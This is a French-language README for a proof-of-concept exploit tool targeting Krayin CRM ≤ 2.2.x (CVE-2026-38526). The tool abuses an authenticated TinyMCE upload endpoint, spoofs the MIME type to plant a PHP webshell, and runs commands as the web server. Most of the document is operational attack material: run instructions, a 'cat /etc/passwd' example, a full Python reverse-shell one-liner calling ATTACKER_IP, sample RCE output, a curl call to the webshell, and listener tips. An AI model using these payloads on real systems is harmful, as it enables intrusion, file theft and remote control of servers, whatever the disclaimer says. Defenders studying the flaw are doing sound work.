
Exploit automatisé pour Krayin CRM ≤ 2.2.x.
Exploit automatisé pour Krayin CRM ≤ 2.2.x. Ce script exploite une vulnérabilité de téléversement de fichier sans restriction dans l'endpoint TinyMCE (/admin/tinymce/upload), contourne la validation du type MIME en usurpant image/jpeg, téléverse un webshell PHP et exécute des commandes arbitraires avec les privilèges du serveur web.
| Propriété | Valeur |
|---|---|
| ID CVE | CVE-2026-38526 |
| Logiciel concerné | Krayin CRM ≤ 2.2.x |
| Type de vulnérabilité | Téléversement de fichier sans restriction → Exécution de code à distance |
| Authentification | Requise (n'importe quel compte administrateur valide) |
| Endpoint | POST /admin/tinymce/upload |
requestsgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload avec un type MIME usurpé[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
Échec de l'authentification : Vérifiez que les identifiants sont corrects et que le compte existe sur la cible.
Échec de l'extraction du jeton CSRF : Assurez-vous que la cible exécute une version vulnérable de Krayin CRM et que l'endpoint de connexion est accessible.
Le shell inversé ne se connecte pas : Assurez-vous que votre listener est en cours d'exécution (nc -lvnp <PORT>), que les règles du pare-feu autorisent les connexions sortantes et que l'adresse IP/le port de la charge utile sont corrects.
Cet outil est fourni strictement à des fins de tests de sécurité autorisés et à des fins éducatives uniquement. L'accès non autorisé à des systèmes informatiques est illégal. Les utilisateurs sont seuls responsables de s'assurer qu'ils disposent de l'autorisation appropriée avant de tester un système cible. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
b0nyo - Implémentation du PoC
TREXNEGRO - Découverte de la vulnérabilité
| Option | Description | Exemple |
|---|
-i | URL cible (avec ou sans http://) | http://target.com ou target.com |
-u | E-mail/nom d'utilisateur administrateur | [email protected] |
-p | Mot de passe administrateur | AdminPassword123! |
-c | Commande à exécuter (par défaut : id) | whoami |